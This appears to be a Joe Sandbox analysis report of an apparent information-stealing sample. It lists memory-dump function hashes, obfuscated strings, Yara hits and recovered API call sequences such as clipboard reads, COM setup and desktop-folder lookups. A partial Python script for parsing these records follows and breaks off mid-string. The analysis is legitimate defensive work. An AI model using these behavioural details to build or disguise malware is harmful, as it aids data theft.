• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: $!$($+$,$.$/$0$0$1$1$1$1$2$3$3$4$5$5$7$7$8$9$:$;$<$<$=$>$>$?$?$?$@$@$@$B$B$D$D$D$F$J$L$L$N$P$R$T$U$V$W$X$X$Y$Z$[$[$\$]$^$_$`$`$b$b$d$f$f$g$j$o$o$q$r$r$s$u$v$v$x${$|
• API String ID: 0-561599860
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: $!$($+$,$.$/$0$0$1$1$1$1$2$3$3$4$5$5$7$7$8$9$:$;$<$<$=$>$>$?$?$?$@$@$@$B$B$D$D$D$F$J$L$L$N$P$R$T$U$V$W$X$X$Y$Z$[$[$\$]$^$_$`$`$b$b$d$f$f$g$j$o$o$q$r$r$s$u$v$v$x${$|
• API String ID: 0-561599860
                                                                                                                                                                                                                                                                • Opcode ID: 5d0905d9e0f91c5c418c3ecbfefb3f90c6b7c7927ba12d209d8fa4479d815a2e
                                                                                                                                                                                                                                                                • Instruction ID: a871c14f6076b24dd239cd8c5011d173bdc77209d761ce7622f285f1123826a9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d0905d9e0f91c5c418c3ecbfefb3f90c6b7c7927ba12d209d8fa4479d815a2e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89138B3154C7C08ED3359B38849839FBBE2AB96324F098A6DD5E9873C2D7B98445CB53
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: -$.$0$1$4$5$:$=$@$B$D$F$G$H$J$L$N$N$P$R$T$V$X$Z$\$\$^$i$p$q$x$z${$|$~
                                                                                                                                                                                                                                                                • API String ID: 0-168325148
                                                                                                                                                                                                                                                                • Opcode ID: dffcdbe7c59816050bcb47420a350e77fe25c9c65786c839b5995c95da9d8176
                                                                                                                                                                                                                                                                • Instruction ID: 6b3287e7d647f6fc9aa8d330ed56109632cb450684d46cb972cc03f30992e160
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dffcdbe7c59816050bcb47420a350e77fe25c9c65786c839b5995c95da9d8176
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15D19F2090C7D98EDB22C77C884439EBFA15B67324F1882DDD4E96B3D2C3B94946C766
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: -$.$0$1$4$5$:$=$@$B$D$F$G$H$J$L$N$N$P$R$T$V$X$Z$\$\$^$i$p$q$x$z${$|$~
                                                                                                                                                                                                                                                                • API String ID: 0-168325148
                                                                                                                                                                                                                                                                • Opcode ID: 1931f6c8ecb165f1204fd7e146898a82d55f5c0f38f6d6832a679dd5bdd43d7e
                                                                                                                                                                                                                                                                • Instruction ID: 4f7cef6c2bb1f0c972683cee722c8f3895190c587dea8f8adb151bb0e20cda14
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1931f6c8ecb165f1204fd7e146898a82d55f5c0f38f6d6832a679dd5bdd43d7e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02D1B0209087D98EDB22C77C885478EBFA15F57224F0882DCD4E96B3D2C3B9494AC766
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
                                                                                                                                                                                                                                                                • API String ID: 0-3492884535
                                                                                                                                                                                                                                                                • Opcode ID: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                                                                                                                                                                                                                                • Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK$tv
                                                                                                                                                                                                                                                                • API String ID: 0-2608794092
                                                                                                                                                                                                                                                                • Opcode ID: 21657e5fc834c3ca3d925c669eca665cb77afa54e23a7c0446644a9599fb4a76
                                                                                                                                                                                                                                                                • Instruction ID: 95d7e76cba02f0a09582511e26c4ad00c8044fe5fc0ebc2eb1bbe37e4d815997
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21657e5fc834c3ca3d925c669eca665cb77afa54e23a7c0446644a9599fb4a76
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3792C6B59053298BDB24CF59D8887EEBBB1FB85304F2082EDD4596B350DB744A86CF84
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: #f!x$$%$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
                                                                                                                                                                                                                                                                • API String ID: 0-1300133108
                                                                                                                                                                                                                                                                • Opcode ID: 58fd2d3b485852ad044d2fcd85ff715361975f915949706d7940c7d1c4703da1
                                                                                                                                                                                                                                                                • Instruction ID: f0effb65835d2d2e0694896053be4e203788fa5b6255ab66f53faa1eae535f9a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58fd2d3b485852ad044d2fcd85ff715361975f915949706d7940c7d1c4703da1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED9294B5905229CBDB24CF59DC887EEBBB1FB85304F2082E9D4596B350DB744A86CF84
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
                                                                                                                                                                                                                                                                • API String ID: 0-1893782281
                                                                                                                                                                                                                                                                • Opcode ID: 352bc6129ea404ee1fcf6995b34e1b15834a7e93a19395cb87ac8d1b474b4daa
                                                                                                                                                                                                                                                                • Instruction ID: 781679972a6841e1c847c4f60efe13a356bbdcba151b8db67255a8fcfea8ccb6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 352bc6129ea404ee1fcf6995b34e1b15834a7e93a19395cb87ac8d1b474b4daa
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E92A6B5905229CBDB24CF59D8887EEBB71FB85304F2082EDD4596B350DB744A86CF84
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$hi$o#M%$pIrK
• API String ID: 0-2118368390
• Opcode ID: 6369199cb7596cff2474a1e92261283ffba6f3554d101fd91b4a7e503897d434
• Instruction ID: a722f4e1398e7a5a29296cf5bf3a75fd653f3706cccfc8d445f6d5e82b4ce2be
• Opcode Fuzzy Hash: 6369199cb7596cff2474a1e92261283ffba6f3554d101fd91b4a7e503897d434
• Instruction Fuzzy Hash: 7D32FCB484A3698ADBA5CF5599883CDBB70FB51304F2082D8C46D3B264DBB50BC6CF85
APIs
• CoCreateInstance.COMBASE(0044168C,00000000,00000001,0044167C,00000000), ref: 0212829B
• SysAllocString.OLEAUT32()\"^), ref: 0212832A
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02128368
• SysAllocString.OLEAUT32()\"^), ref: 021283E5
• SysAllocString.OLEAUT32()\"^), ref: 0212849F
• VariantInit.OLEAUT32(C7C6C5CC), ref: 0212850F
• VariantClear.OLEAUT32(?), ref: 02128660
• SysFreeString.OLEAUT32(00000000), ref: 02128697
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID: String$Alloc$Variant$BlanketClearCreateFreeInitInstanceProxy
• String ID: P%R$)\"^$.H4J$O@$pq
• API String ID: 2775254435-1397720406
• Opcode ID: 6b5d4364e48706977140092b86c3d080d2f37fa92fd1966bc9ba7ab4e9bc5c07
• Instruction ID: e2bb4e116e29de3b9e39f7d8f5ec7ef660a8b3432bf400d38f49f382176b13f8
• Opcode Fuzzy Hash: 6b5d4364e48706977140092b86c3d080d2f37fa92fd1966bc9ba7ab4e9bc5c07
• Instruction Fuzzy Hash: F122EFB2A483508FD314CF24C880B9BBBE6EFC5704F158A2CF5959B291D775D909CBA2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: !+2j$"$$01;$(7.A$908#$>7;<$O35 $bblg$gn~b$ne$vm/;$w!w4
• API String ID: 0-1290103930
• Opcode ID: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
• Instruction ID: 9da03d0d7728415739df837e9a5d6b3acde744231e06f1a9769003f2125b84bf
• Opcode Fuzzy Hash: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
• Instruction Fuzzy Hash: 50A1D37120C3D18BC316CF6984A076BBFE0AF97304F484A6DE4D55B382D339890ACB56
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: !+2j$"$$01;$(7.A$908#$>7;<$O35 $bblg$gn~b$ne$vm/;$w!w4
• API String ID: 0-1290103930
• Opcode ID: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
• Instruction ID: b435dd98ba43b9ce93071136f58dc90e9f5099a506e4a89607eb8f3d5c576feb
• Opcode Fuzzy Hash: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
• Instruction Fuzzy Hash: 12A1037024C3D58BC356CF6984A076BBFE0AFD7648F184AACE5D54B742C33A850AD762
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
• API String ID: 0-1763234448
• Opcode ID: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
• Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
• Opcode Fuzzy Hash: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
• Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86
APIs
  • Part of subcall function 0043C1F0: LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
• FreeLibrary.KERNEL32(?), ref: 0041A6BD
• FreeLibrary.KERNEL32(?), ref: 0041A77B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID: FreeLibrary$InitializeThunk
• String ID: / $/,-$Wu$46
• API String ID: 764372645-3330591033
• Opcode ID: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
• Instruction ID: fba97bcbe2fd55ed4e85c885b06b17ae8f82464d9f69d288493d133838553020
• Opcode Fuzzy Hash: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
• Instruction Fuzzy Hash: 9EB247766493009FE3208BA5D8847ABBBD2EBC5310F18D42EE9D497311D7789C858B9B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: 0u4w$KT$Q$SV$_q$p8`;$qr$xy
• API String ID: 0-1826372655
• Opcode ID: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
• Instruction ID: 8fe2ea29b4499c84cffcf606e05d59b8c59937f8b413fb95e2f4cb334fca5623
• Opcode Fuzzy Hash: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
• Instruction Fuzzy Hash: C92212B690C3109BD304DF59D8816ABB7E2EFD5314F09892DE8C98B351E739C905CB8A
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                                                • String ID: / $/,-$46
                                                                                                                                                                                                                                                                • API String ID: 3664257935-479303636
                                                                                                                                                                                                                                                                • Opcode ID: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
                                                                                                                                                                                                                                                                • Instruction ID: c04063689c9e0e3c8195488aa58e878306a25e5018eacb1abeca154e0fd30aee
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27B267766883409FE3208B95D8C4B7FBBE3ABC5304F1CC42DE6D49B291D7B599458B82
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 1]_$:;$}JsE$}JsE$AC$E)G$Q?S
                                                                                                                                                                                                                                                                • API String ID: 0-2463461626
                                                                                                                                                                                                                                                                • Opcode ID: 80c25fe3e2dfb50a6448c8159146231cdcc410b8e27bdf8e1fa965ce3e3910ee
                                                                                                                                                                                                                                                                • Instruction ID: 1dd51b58cbaf6b0a0f55c15d87e18128fba8370b8dc8b23ccf2a832bc891c079
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80c25fe3e2dfb50a6448c8159146231cdcc410b8e27bdf8e1fa965ce3e3910ee
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29D1497665C3548BD324CF2488516ABBBE2EBC1304F1D897EE4D69B381D638C916CB87
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 1]_$:;$}JsE$}JsE$AC$E)G$Q?S
                                                                                                                                                                                                                                                                • API String ID: 0-2463461626
                                                                                                                                                                                                                                                                • Opcode ID: 682ddf53b01bc525795b072e2938ffae95751b7f3a8718d374d2731849975a8c
                                                                                                                                                                                                                                                                • Instruction ID: 08ded7fadf2984c9239f50149bbaa213a5be55d2105bb5abc7ba080155b14994
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 682ddf53b01bc525795b072e2938ffae95751b7f3a8718d374d2731849975a8c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40D1497268C3548BC365CF24C8516ABBBE2ABC1308F1D896DE5DA8B741D739C509DB82
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1006321803-0
                                                                                                                                                                                                                                                                • Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                                                                                                                                                                                                                                • Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
                                                                                                                                                                                                                                                                • API String ID: 0-2309992716
                                                                                                                                                                                                                                                                • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                                • Instruction ID: 26eceaee55227743b306782b87e7b3b011f3ad886b5b359efa5fd428808e0ec2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F661F37164D3C68AD3118F3988A076BFFE09FA3310F18497EE4D05B382D7798A09975A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
                                                                                                                                                                                                                                                                • API String ID: 0-2309992716
                                                                                                                                                                                                                                                                • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                                • Instruction ID: a7b1eef5a6b1c245ffab8ca2cb0362c25ded32e739c28f295cb6cae52d0c6043
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7461476168C3CA8AD3528F3988A076AFFE0DF93204F18496DE4D14B782D379C60DE716
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: #4<7$+8=>$PK$Tiec$\$r
                                                                                                                                                                                                                                                                • API String ID: 0-1906979145
                                                                                                                                                                                                                                                                • Opcode ID: eb9bb64c8f79c1854ab48af47ab7cc54b735788ac4fdc3cb149e9e4095002922
• Instruction ID: 0276b3c80838692bea6cd060c6c8b834ed69fe73052146a73dd4a6e0b20dc47d
• Opcode Fuzzy Hash: eb9bb64c8f79c1854ab48af47ab7cc54b735788ac4fdc3cb149e9e4095002922
• Instruction Fuzzy Hash: CAD13376A483448BD318CF25C8916ABBBE2EFC1318F18892DE5E68B650D738C905CB46
APIs
• GetCurrentProcessId.KERNEL32 ref: 020F8B83
• GetCurrentThreadId.KERNEL32 ref: 020F8B8C
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 020F8C42
• GetForegroundWindow.USER32 ref: 020F8C9A
  • Part of subcall function 020FC7B7: CoInitializeEx.COMBASE(00000000,00000002), ref: 020FC7CA
  • Part of subcall function 020FB5F7: FreeLibrary.KERNEL32(020F8D1F), ref: 020FB5FD
  • Part of subcall function 020FB5F7: FreeLibrary.KERNEL32 ref: 020FB61E
• ExitProcess.KERNEL32 ref: 020F8D38
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
• String ID:
• API String ID: 3072701918-0
• Opcode ID: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
• Instruction ID: 550726f10ae5b8be2442dca0c4b28ed1d570ac5b582bee2d953d8fbead30dd87
• Opcode Fuzzy Hash: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
• Instruction Fuzzy Hash: 0F51B8B7F903180BD75CAEA9CC4A79975878BC5710F1EC13D4A40DB7D1EEB8880192C1
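The API list in the record above is the call sequence the sandbox recovered for one function of the unpacked stage: every call site (020F8B83 to 020F8D38) lies inside the 020F0000 memory dump, which the report marks "based on PE: false", i.e. code that is not backed by the on-disk image. The two argument constants the listing leaves numeric are 0x10 to SHGetSpecialFolderPathW (CSIDL_DESKTOPDIRECTORY) and 0x2 to CoInitializeEx (COINIT_APARTMENTTHREADED). The following Python is an added example, not part of this report or of Joe Sandbox's tooling: it parses a record in this listing's layout into structured call-site data, checks the call sites against the dump base, and names those two constants from the Windows SDK. The embedded record text is constructed from the entry above with the layout indentation removed; the regular expressions are this example's own assumption about the listing format and cover only the line shapes visible on this page.

```python
# Parse one Joe Sandbox function record into structured call-site data.
# Added example, not part of this report or of Joe Sandbox's tooling; the
# embedded record text and the regular expressions are this example's assumptions.
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample: the function record listed above, layout indentation removed.
SAMPLE_RECORD = """\
APIs
• GetCurrentProcessId.KERNEL32 ref: 020F8B83
• GetCurrentThreadId.KERNEL32 ref: 020F8B8C
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 020F8C42
• GetForegroundWindow.USER32 ref: 020F8C9A
  • Part of subcall function 020FC7B7: CoInitializeEx.COMBASE(00000000,00000002), ref: 020FC7CA
  • Part of subcall function 020FB5F7: FreeLibrary.KERNEL32(020F8D1F), ref: 020FB5FD
  • Part of subcall function 020FB5F7: FreeLibrary.KERNEL32 ref: 020FB61E
• ExitProcess.KERNEL32 ref: 020F8D38
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Similarity
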